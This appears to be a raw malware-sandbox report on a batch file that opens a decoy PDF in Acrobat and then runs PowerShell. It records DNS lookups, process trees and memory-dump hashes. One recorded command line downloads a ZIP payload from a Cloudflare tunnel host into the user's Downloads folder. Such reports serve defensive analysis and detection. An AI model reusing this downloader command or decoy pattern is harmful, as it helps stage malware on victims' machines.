                                                                  Oct 25, 2024 19:47:23.418999910 CEST192.168.2.71.1.1.10xd81Standard query (0)michael-scanned-motherboard-reforms.trycloudflare.comA (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:24.088661909 CEST192.168.2.71.1.1.10xe5c8Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:29.846689939 CEST192.168.2.71.1.1.10xd9e5Standard query (0)michael-scanned-motherboard-reforms.trycloudflare.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 25, 2024 19:47:23.429461002 CEST1.1.1.1192.168.2.70xd81Name error (3)michael-scanned-motherboard-reforms.trycloudflare.comnonenoneA (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:24.097904921 CEST1.1.1.1192.168.2.70xe5c8No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:25.057967901 CEST1.1.1.1192.168.2.70x21fbNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:25.057967901 CEST1.1.1.1192.168.2.70x21fbNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:47:29.856045961 CEST1.1.1.1192.168.2.70xd9e5Name error (3)michael-scanned-motherboard-reforms.trycloudflare.comnonenoneA (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:48:15.893157005 CEST1.1.1.1192.168.2.70xc436No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Oct 25, 2024 19:48:15.893157005 CEST1.1.1.1192.168.2.70xc436No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  • armmf.adobe.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.74977196.7.168.1384437600C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-10-25 17:47:28 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                  Host: armmf.adobe.com
                                                                  Connection: keep-alive
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  If-None-Match: "78-5faa31cce96da"
                                                                  If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                  2024-10-25 17:47:29 UTC198INHTTP/1.1 304 Not Modified
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                  ETag: "78-5faa31cce96da"
                                                                  Date: Fri, 25 Oct 2024 17:47:29 GMT
                                                                  Connection: close


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:1
                                                                  Start time:13:47:11
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" "
                                                                  Imagebase:0x7ff73f950000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:13:47:11
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff75da10000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:13:47:11
                                                                  Start date:25/10/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"
                                                                  Imagebase:0x7ff702560000
                                                                  File size:5'641'176 bytes
                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:5
                                                                  Start time:13:47:11
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\timeout.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:timeout /t 5
                                                                  Imagebase:0x7ff742c00000
                                                                  File size:32'768 bytes
                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:13:47:15
                                                                  Start date:25/10/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff6c3ff0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:13:47:15
                                                                  Start date:25/10/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff6c3ff0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:9
                                                                  Start time:13:47:16
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
                                                                  Imagebase:0x7ff741d30000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:13:47:27
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
                                                                  Imagebase:0x7ff741d30000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:15:27:08
                                                                  Start date:25/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff75da10000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1467769021.00007FFA9FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA9FCE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffa9fce0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5012debccf382828862798e11fd59f7244400abed8f864fdf0a11017dbe70c94
                                                                    • Instruction ID: a8916d91da89771f7d30b237d7a667adcbaaaa7ca1d50f7ff066c441dd2984ff
                                                                    • Opcode Fuzzy Hash: 5012debccf382828862798e11fd59f7244400abed8f864fdf0a11017dbe70c94
                                                                    • Instruction Fuzzy Hash: 1B612831A0C6854FE315DB3CE8919E57BE0EF5632470882BED0CDCB1ABDA25B846C795
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1467769021.00007FFA9FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA9FCE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffa9fce0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8070a6eb7f8f419712581e5af72d135f29989722f875d575e96cdeba427b76d9
                                                                    • Instruction ID: c6306040d27344fc7f7010e2c4d4d18a7dc3f0f93d2285cc4518e9bc4908bacf
                                                                    • Opcode Fuzzy Hash: 8070a6eb7f8f419712581e5af72d135f29989722f875d575e96cdeba427b76d9
                                                                    • Instruction Fuzzy Hash: B1C15070A18A4D8FDF98DF68D855AA9BBE1FF59300F14827AD40DD7295CA25EC41CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1467769021.00007FFA9FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA9FCE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffa9fce0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4dea6dcd3a3b5bc55877753816d334eaa902f92dbf8afb34f13912f5fa23201
                                                                    • Instruction ID: 3b2bbd2dd65b6411d24857709d1187b5a8fa4e294ac3c77354942a78beaece38
                                                                    • Opcode Fuzzy Hash: f4dea6dcd3a3b5bc55877753816d334eaa902f92dbf8afb34f13912f5fa23201
                                                                    • Instruction Fuzzy Hash: C001447111CB084FD748EF0CE451AA5B7E0FB95364F10056EE59AC3695D726E881CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1467769021.00007FFA9FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA9FCE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffa9fce0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e86fb1b6b2553b5f277347f3dccbbb03f75c95027a3a034c60830dc6ca3cdf89
                                                                    • Instruction ID: 23c5be0a45a90d65911b159914a592264230159545ca5663a638ac1fee3d0b4c
                                                                    • Opcode Fuzzy Hash: e86fb1b6b2553b5f277347f3dccbbb03f75c95027a3a034c60830dc6ca3cdf89
                                                                    • Instruction Fuzzy Hash: 65F0303275C6058FDB5CAA1CF8429B5B3D1EB9A320B10417EE48FC2697D927F8428685